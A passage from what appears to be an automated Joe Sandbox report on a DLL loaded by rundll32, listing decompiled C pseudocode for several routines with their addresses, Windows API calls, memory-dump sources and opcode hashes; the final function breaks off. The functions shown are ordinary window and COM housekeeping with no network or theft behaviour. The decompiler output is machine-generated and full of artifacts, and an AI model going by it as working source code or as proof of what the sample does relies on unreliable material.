                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
                                                                                                            • Instruction ID: 281bcab43dd18555d5c8873d9ecd9dd0d63f565addb1b321d849296a265f2762
                                                                                                            • Opcode Fuzzy Hash: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
                                                                                                            • Instruction Fuzzy Hash: B0F09636201A115FF741AF658C8893FB7ACEFC96E6B02403AFD05D2116EE618D058271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10008219 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10008219() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000EFCE(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10007C2C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1001FC9C(_t16);
			}








                                                                                                            0x10008219
                                                                                                            0x1000821c
                                                                                                            0x10008224
                                                                                                            0x1000822a
                                                                                                            0x1000822a
                                                                                                            0x10008232
                                                                                                            0x10008239
                                                                                                            0x10008239
                                                                                                            0x10008242
                                                                                                            0x10008244
                                                                                                            0x1000824a
                                                                                                            0x1000824d
                                                                                                            0x10008252
                                                                                                            0x10008252
                                                                                                            0x1000824d
                                                                                                            0x1000825c
                                                                                                            0x10008261
                                                                                                            0x10008269
                                                                                                            0x1000826e
                                                                                                            0x1000826e
                                                                                                            0x10008274
                                                                                                            0x1000827c

                                                                                                            APIs
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10008239
                                                                                                            • GetActiveWindow.USER32 ref: 10008244
                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E
                                                                                                              • Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 253586258-0
                                                                                                            • Opcode ID: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
                                                                                                            • Instruction ID: 9d83087e220dd0781b059ca2b134525f77e60f6c7b422949920854a7550f5502
                                                                                                            • Opcode Fuzzy Hash: b350666bfdb60a23390b1ddd49cbda8f00418691cb9fbf53fe745009104ea4cd
                                                                                                            • Instruction Fuzzy Hash: A0F03C34900A19CFEF12DB64CD855ADB7F1FF88B81B200528E48276169CB726E40CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001E221 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001E221(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10048888;
					if( *0x10048888 == 0) {
						_t5 = GetTickCount();
						 *0x10048888 =  *0x10048888 + 1;
						__eflags =  *0x10048888;
						 *0x100453a0 = _t5;
					}
					_t4 = GetTickCount() -  *0x100453a0;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100453a0 = _t4;
					}
					return _t4;
				}
				return E1001E1CA(_t7, _t8, _t9, _t13, _t14, _a8);
			}









                                                                                                            0x1001e221
                                                                                                            0x1001e226
                                                                                                            0x1001e233
                                                                                                            0x1001e241
                                                                                                            0x1001e243
                                                                                                            0x1001e245
                                                                                                            0x1001e245
                                                                                                            0x1001e24b
                                                                                                            0x1001e24b
                                                                                                            0x1001e252
                                                                                                            0x1001e258
                                                                                                            0x1001e25d
                                                                                                            0x1001e25f
                                                                                                            0x1001e265
                                                                                                            0x1001e267
                                                                                                            0x1001e267
                                                                                                            0x00000000
                                                                                                            0x1001e26c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E243
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E250
                                                                                                            • CoFreeUnusedLibraries.OLE32 ref: 1001E25F
                                                                                                            • GetTickCount.KERNEL32 ref: 1001E265
                                                                                                              • Part of subcall function 1001E1CA: CoFreeUnusedLibraries.OLE32(00000000,1001E2A9,00000000), ref: 1001E20E
                                                                                                              • Part of subcall function 1001E1CA: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1001E2A9), ref: 1001E214
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 685759847-0
                                                                                                            • Opcode ID: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
                                                                                                            • Instruction ID: 9aa4607869117499f4b65bf9b804208a697730aabcf92e8cb44ab6419cd381d0
                                                                                                            • Opcode Fuzzy Hash: b989edfafec850737555b4dcdb83f250162968ff4dd316512e162b5f5acc9b84
                                                                                                            • Instruction Fuzzy Hash: D2E0ED30C04265DEE705EF20CE8464D3AE4FB4A392F914916E441DA161C7749EC0DF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001842E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E1001842E(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10004D4A( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10004D4A( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10017B9D(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10020F40(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E1000911A( &_v20);
										E100157C0(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10004D75(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10004D75(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10017B9D(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}



























                                                                                                            0x10018436
                                                                                                            0x10018438
                                                                                                            0x1001843d
                                                                                                            0x10018450
                                                                                                            0x10018454
                                                                                                            0x10018491
                                                                                                            0x10018491
                                                                                                            0x10018493
                                                                                                            0x10018496
                                                                                                            0x10018499
                                                                                                            0x100184b2
                                                                                                            0x100184b2
                                                                                                            0x100184b5
                                                                                                            0x100184b7
                                                                                                            0x100184bd
                                                                                                            0x100184be
                                                                                                            0x100184c5
                                                                                                            0x100184ce
                                                                                                            0x100184ce
                                                                                                            0x100184d1
                                                                                                            0x100184d4
                                                                                                            0x100184d7
                                                                                                            0x100184da
                                                                                                            0x10018584
                                                                                                            0x10018584
                                                                                                            0x10018587
                                                                                                            0x10018598
                                                                                                            0x1001859b
                                                                                                            0x1001859e
                                                                                                            0x100185a0
                                                                                                            0x100185a6
                                                                                                            0x100185ae
                                                                                                            0x100185b7
                                                                                                            0x100185b7
                                                                                                            0x100185ba
                                                                                                            0x100185bd
                                                                                                            0x100185e4
                                                                                                            0x100185e6
                                                                                                            0x00000000
                                                                                                            0x100185bf
                                                                                                            0x100185bf
                                                                                                            0x100185bf
                                                                                                            0x100185c1
                                                                                                            0x100185cb
                                                                                                            0x100185d3
                                                                                                            0x100185d8
                                                                                                            0x100185db
                                                                                                            0x100185dc
                                                                                                            0x100185df
                                                                                                            0x100185df
                                                                                                            0x00000000
                                                                                                            0x100185c1
                                                                                                            0x100184e0
                                                                                                            0x100184e0
                                                                                                            0x100184e3
                                                                                                            0x100184ed
                                                                                                            0x100184f0
                                                                                                            0x100184f2
                                                                                                            0x100184f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100184fa
                                                                                                            0x100184fa
                                                                                                            0x100184fd
                                                                                                            0x1001850b
                                                                                                            0x10018521
                                                                                                            0x1001852f
                                                                                                            0x10018536
                                                                                                            0x1001853e
                                                                                                            0x10018546
                                                                                                            0x1001854e
                                                                                                            0x10018551
                                                                                                            0x10018562
                                                                                                            0x10018566
                                                                                                            0x10018569
                                                                                                            0x10018569
                                                                                                            0x1001856f
                                                                                                            0x1001856f
                                                                                                            0x10018571
                                                                                                            0x10018571
                                                                                                            0x10018577
                                                                                                            0x1001857b
                                                                                                            0x1001857b
                                                                                                            0x00000000
                                                                                                            0x100184e3
                                                                                                            0x100184da
                                                                                                            0x1001849e
                                                                                                            0x1001849e
                                                                                                            0x100184a1
                                                                                                            0x100184a1
                                                                                                            0x100184a3
                                                                                                            0x100184a6
                                                                                                            0x100184a9
                                                                                                            0x100184aa
                                                                                                            0x100184ad
                                                                                                            0x100184ad
                                                                                                            0x00000000
                                                                                                            0x100184a1
                                                                                                            0x10018456
                                                                                                            0x10018458
                                                                                                            0x1001845b
                                                                                                            0x1001848e
                                                                                                            0x1001848e
                                                                                                            0x00000000
                                                                                                            0x1001848e
                                                                                                            0x1001845d
                                                                                                            0x10018460
                                                                                                            0x10018467
                                                                                                            0x1001846d
                                                                                                            0x10018471
                                                                                                            0x10018472
                                                                                                            0x10018472
                                                                                                            0x10018477
                                                                                                            0x1001847a
                                                                                                            0x1001847c
                                                                                                            0x1001847f
                                                                                                            0x10018484
                                                                                                            0x10018487
                                                                                                            0x1001848d
                                                                                                            0x00000000
                                                                                                            0x1001847a
                                                                                                            0x1001843f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearVariant
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1473721057-3887548279
                                                                                                            • Opcode ID: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
                                                                                                            • Instruction ID: 6ae8da63e7d5010fc6edffe141db471ece515f0fbfe2aaea2c8eafc942244063
                                                                                                            • Opcode Fuzzy Hash: 650e1625d138af3bf796221f7abd9814e81232dc94ad6635265dd7e5ceee5af7
                                                                                                            • Instruction Fuzzy Hash: A6516875A00B01DFDB64CF68C9C295AB7F1FF48314B504A6EE5868BA91CB70FA80CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001615A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E1001615A(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1001FBC4(E10034098, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1003b29c);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1001FC9C(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1001BDF4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x100388d8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x100388dc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1003b2ec);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x10044410;
					E100209E8( &_v24, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t128, _t153, _t155);
					_t132 = E100105C8(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1000E58E(_t132);
					}
					return E1001FC9C(_t90);
				}
			}






































                                                                                                            0x1001615a
                                                                                                            0x1001615a
                                                                                                            0x10016161
                                                                                                            0x10016166
                                                                                                            0x10016168
                                                                                                            0x1001616d
                                                                                                            0x10016171
                                                                                                            0x10016176
                                                                                                            0x10016180
                                                                                                            0x10016181
                                                                                                            0x10016186
                                                                                                            0x10016189
                                                                                                            0x1001618b
                                                                                                            0x1001618c
                                                                                                            0x10016193
                                                                                                            0x10016308
                                                                                                            0x10016310
                                                                                                            0x10016199
                                                                                                            0x100161a3
                                                                                                            0x00000000
                                                                                                            0x100161a5
                                                                                                            0x100161ab
                                                                                                            0x100161b4
                                                                                                            0x100161bd
                                                                                                            0x100161c4
                                                                                                            0x100161cb
                                                                                                            0x100161ce
                                                                                                            0x100161d1
                                                                                                            0x100161d4
                                                                                                            0x100161d7
                                                                                                            0x100161dc
                                                                                                            0x100161e1
                                                                                                            0x100161e4
                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ee
                                                                                                            0x00000000
                                                                                                            0x100161f0
                                                                                                            0x100161f0
                                                                                                            0x100161f6
                                                                                                            0x100161ff
                                                                                                            0x1001620a
                                                                                                            0x1001620c
                                                                                                            0x10016212
                                                                                                            0x10016212
                                                                                                            0x10016215
                                                                                                            0x10016218
                                                                                                            0x1001622b
                                                                                                            0x1001623d
                                                                                                            0x10016245
                                                                                                            0x10016257
                                                                                                            0x1001625f
                                                                                                            0x10016272
                                                                                                            0x1001627a
                                                                                                            0x1001628c
                                                                                                            0x10016294
                                                                                                            0x1001629a
                                                                                                            0x100162a2
                                                                                                            0x100162a3
                                                                                                            0x100162a8
                                                                                                            0x100162ad
                                                                                                            0x100162af
                                                                                                            0x100162af
                                                                                                            0x100162b3
                                                                                                            0x100162b9
                                                                                                            0x100162bd
                                                                                                            0x100162be
                                                                                                            0x100162c7
                                                                                                            0x100162cd
                                                                                                            0x100162d2
                                                                                                            0x100162d8
                                                                                                            0x100162de
                                                                                                            0x100162e1
                                                                                                            0x100162e1
                                                                                                            0x100162e8
                                                                                                            0x100162ee
                                                                                                            0x100162f1
                                                                                                            0x100162f6
                                                                                                            0x100162fb
                                                                                                            0x100162fb
                                                                                                            0x10016302
                                                                                                            0x00000000
                                                                                                            0x10016302
                                                                                                            0x100161ee
                                                                                                            0x100161e4
                                                                                                            0x100161a3
                                                                                                            0x10016178
                                                                                                            0x10016178
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3
                                                                                                            • String ID: @
                                                                                                            • API String ID: 431132790-2766056989
                                                                                                            • Opcode ID: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
                                                                                                            • Instruction ID: a1e3f74af39593b6165eabf356290d244c81fe92429bd0fa7cefced01a7d7b0f
                                                                                                            • Opcode Fuzzy Hash: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
                                                                                                            • Instruction Fuzzy Hash: 3351B671A0021A9FDB04CFA8C8849EEB7F9FF48304F15456EE516EB251EB74A945CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D09E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000D09E(void* __ebx, signed short __ecx, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
